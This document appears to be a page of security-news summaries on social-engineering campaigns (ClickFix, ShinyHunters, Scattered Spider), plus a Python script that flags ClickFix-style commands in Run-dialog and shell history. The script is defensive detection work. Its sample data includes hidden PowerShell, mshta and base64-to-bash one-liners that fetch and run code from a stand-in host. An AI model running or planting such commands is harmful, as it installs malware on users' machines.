ErrTraffic is a new cybercrime platform, sold on hacker forums for $800, that automates ClickFix attacks: it plants fake browser error prompts on compromised websites that trick visitors into downloading malware or pasting and running attacker-supplied commands. It is pitched with high success rates and customizable payloads for multiple operating systems.
A ClickFix scam campaign is targeting Windows and macOS users by exploiting trust in online travel bookings. It uses social engineering lures such as fake CAPTCHA prompts and payloads that adapt to the victim's device to infect machines with malware like PureRAT. Because the victim is talked into running the command with native OS tools, the attacks often bypass security products, so awareness and cautious behavior are the best defenses, especially during holiday gatherings when family members may be less vigilant.
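The two items above describe the same paste-and-run pattern: the lure gets the victim to open a native launcher (the Windows Run dialog or PowerShell, Terminal on macOS) and paste a command that fetches a second stage, hides itself, and often ends in a fake "verification" comment so the text looks harmless. The script below is an added example, not code from the original page or from any vendor named on it. It scores recorded commands for those traits, reading them from a .reg export of the Windows RunMRU key (which Explorer keeps for the Run dialog) and from a zsh history file. The rule weights, the threshold of 5, the lure.example URLs and every sample entry are constructed assumptions for illustration.

```python
import re
from dataclasses import dataclass, field

# (rule name, pattern, weight). Weights and names are assumptions; tune per environment.
RULES = [
    ("launcher", re.compile(
        r"\b(powershell|pwsh|mshta|cmd(\.exe)?|wscript|cscript|rundll32|regsvr32|"
        r"bash|zsh|sh|osascript|curl|wget)\b", re.I), 1),
    ("hidden_or_unrestricted", re.compile(
        r"-w(indowstyle)?\s+h(idden)?\b|-nop\b|-noprofile\b|-noni\b|-ep\s+bypass|"
        r"-executionpolicy\s+bypass", re.I), 2),
    ("encoded", re.compile(
        r"-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}|base64\s+(-d|-D|--decode)", re.I), 2),
    ("remote_fetch", re.compile(
        r"https?://|\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"\bcurl\s|\bwget\s", re.I), 2),
    ("lolbin_with_url", re.compile(
        r"\b(mshta|regsvr32|rundll32|certutil|bitsadmin)\b.*https?://", re.I), 3),
    ("pipe_to_exec", re.compile(
        r"\|\s*(iex|invoke-expression|bash|sh|zsh|python3?|osascript)\b", re.I), 3),
    ("fake_verification", re.compile(
        r"not a robot|captcha|verification\s*id|verify you are human|ray\s*id", re.I), 3),
]


@dataclass
class Finding:
    source: str
    command: str
    score: int
    hits: list[str] = field(default_factory=list)


def score_command(command: str) -> tuple[int, list[str]]:
    """Sum the weights of every rule whose pattern occurs in the command."""
    hits = [name for name, pattern, _ in RULES if pattern.search(command)]
    return sum(w for name, _, w in RULES if name in hits), hits


def parse_runmru_export(reg_text: str) -> list[tuple[str, str]]:
    """Parse a .reg export of the RunMRU key into (source, command) pairs.

    Explorer stores each Run-dialog entry as a string ending in a literal "\\1";
    .reg files additionally escape backslashes and quotes, so both layers are undone.
    """
    entries = []
    for line in reg_text.splitlines():
        m = re.match(r'^"([^"]+)"="(.*)"$', line.strip())
        if not m or m.group(1) == "MRUList":
            continue
        command = re.sub(r"\\(.)", r"\1", m.group(2))  # undo .reg escaping
        if command.endswith("\\1"):
            command = command[:-2]  # drop Explorer's trailing \1 marker
        entries.append((f"RunMRU:{m.group(1)}", command))
    return entries


def parse_zsh_history(text: str) -> list[tuple[str, str]]:
    """Parse a zsh history file, with or without EXTENDED_HISTORY timestamps."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        command = re.sub(r"^: \d+:\d+;", "", line).strip()
        if command:
            entries.append((f"zsh_history:{n}", command))
    return entries


def triage(entries, threshold: int = 5) -> list[Finding]:
    """Return commands scoring at or above threshold, most suspicious first."""
    findings = []
    for source, command in entries:
        score, hits = score_command(command)
        if score >= threshold:
            findings.append(Finding(source, command, score, hits))
    return sorted(findings, key=lambda f: f.score, reverse=True)


# Constructed sample inputs, not real telemetry. The base64 string is just the
# uppercase alphabet encoded, standing in for an encoded stage-two loader.
SAMPLE_RUNMRU_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="powershell -w hidden -c \"iwr http://lure.example/verify.ps1 | iex\" # \"I am not a robot - reCAPTCHA Verification ID: 7421\"\\1"
"c"="mshta http://lure.example/verify.mp4\\1"
"MRUList"="cba"
'''
SAMPLE_ZSH_HISTORY = """: 1731000000:0;ls -la
: 1731000010:0;curl https://example.com/index.html -o index.html
: 1731000020:0;echo "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=" | base64 -d | bash
: 1731000030:0;osascript -e 'display dialog "Verification complete"'
"""

if __name__ == "__main__":
    entries = parse_runmru_export(SAMPLE_RUNMRU_REG) + parse_zsh_history(SAMPLE_ZSH_HISTORY)
    for f in triage(entries):
        print(f"{f.score:>2}  {f.source:<16} {', '.join(f.hits)}\n    {f.command}")
```

On the sample data the hidden PowerShell one-liner with the fake reCAPTCHA comment, the mshta call to a remote URL and the `base64 -d | bash` pipeline are flagged, while a plain `curl -o` download and a benign osascript stay below the threshold. The score is a triage signal, not a verdict: administrators do run `curl | bash` and encoded PowerShell, so pair a hit with the parent-process context (a launcher spawned shortly after browser activity) before acting on it.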
Cybersecurity researchers disclosed four vulnerabilities in Microsoft Teams that could let attackers impersonate colleagues, alter messages without leaving a trace, and spoof notifications, creating significant social engineering risk. Some of the issues have been patched, but the flaws show why collaboration tools must be secured against trust-based attacks as threat actors increasingly target enterprise communication platforms.
Researchers at ESET identified 12 malicious Android apps, some of them distributed through Google Play, that secretly record conversations and steal personal data using spyware called VajraSpy; the apps are spread through social engineering that exploits the victim's emotional trust. Users are advised to delete these apps immediately, watch for signs of infection, and follow security best practices to protect their privacy.
ShinyHunters, a cybercrime group known for data breaches that now relies on voice-based social engineering (vishing), has targeted major companies including Salesforce customers, affecting millions of users. The group has links to other hacking groups, sells stolen data, and offers ransomware services. Defending against these attacks requires vigilance, employee training, and stronger controls such as multi-factor authentication; AI-generated deepfakes make the calls more convincing and harder to detect.
Workday, a provider of HR technology, experienced a data breach affecting some user contact information, likely linked to a larger attack on Salesforce databases by the hacking group ShinyHunters, raising concerns about social engineering scams and limited disclosure practices.
Workday experienced a data breach through a social engineering attack targeting its employees, which compromised some business contact information from its third-party CRM platform, though no customer account data was reportedly accessed. The company responded quickly by cutting off access and enhancing security measures, but the full scope of the breach remains uncertain.
Workday disclosed a data breach resulting from a social engineering attack on a third-party CRM platform, likely linked to the ShinyHunters campaign against Salesforce instances, that exposed business contact information for over 11,000 organizations, including some of the Fortune 500; the company states that customer tenants were not affected.
The Russian-linked cybercriminal group EncryptHub is combining social engineering over Microsoft Teams with a zero-day vulnerability in Microsoft Management Console to gain remote access, deploy malware, and steal sensitive data, underscoring the need for prompt patching and stronger controls around remote-assistance requests.
Google announced that the hacking group ShinyHunters breached one of its Salesforce databases containing contact information for small and medium-sized businesses, but the hackers only accessed publicly available data for a brief period. The group is known for social engineering attacks and has targeted other major companies this year, often demanding ransom after data exfiltration.
The FBI has warned organizations about helpdesk-driven password resets in response to Scattered Spider, which uses social engineering to manipulate support staff into resetting passwords and transferring MFA tokens to attacker-controlled devices. Organizations are advised to use phishing-resistant multi-factor authentication and to review helpdesk identity-verification procedures to prevent these targeted attacks. Separately, the FBI warns against scanning QR codes found in unsolicited packages, which can lead to financial fraud and data theft.
The FBI and CISA have issued a joint warning about helpdesk password resets in response to attacks by the threat group Scattered Spider, which uses sophisticated social engineering to manipulate helpdesk staff into resetting passwords and transferring MFA tokens. Organizations are advised to use phishing-resistant multi-factor authentication and to review helpdesk procedures to prevent these targeted attacks.
The FBI and international agencies warn that the cybercriminal group Scattered Spider has adapted its tactics, now combining sophisticated social engineering, legitimate remote access software, and DragonForce ransomware to infiltrate organizations, exfiltrate data, and encrypt systems rapidly. The group targets sectors such as retail, insurance, and aviation, often exfiltrating data to multiple sites before deploying the ransomware, with a particular focus on VMware ESXi servers. Although recent arrests have slowed its activity, authorities advise organizations to strengthen defenses with offline backups, multi-factor authentication, and application controls.
Scattered Spider is targeting VMware ESXi hypervisors in North America, using social engineering and sophisticated follow-on tactics to deploy ransomware that can cause severe infrastructure disruption. Organizations are advised to enhance security measures, including hypervisor hardening and monitoring, especially as VMware vSphere 7 approaches end of support.
Scattered Spider's ESXi attacks begin with social engineering, progress through privilege escalation to extensive control over the virtualized environment, and end in data exfiltration and ransomware deployment; the multi-phase progression from initial access onward highlights the need for stronger controls at each stage.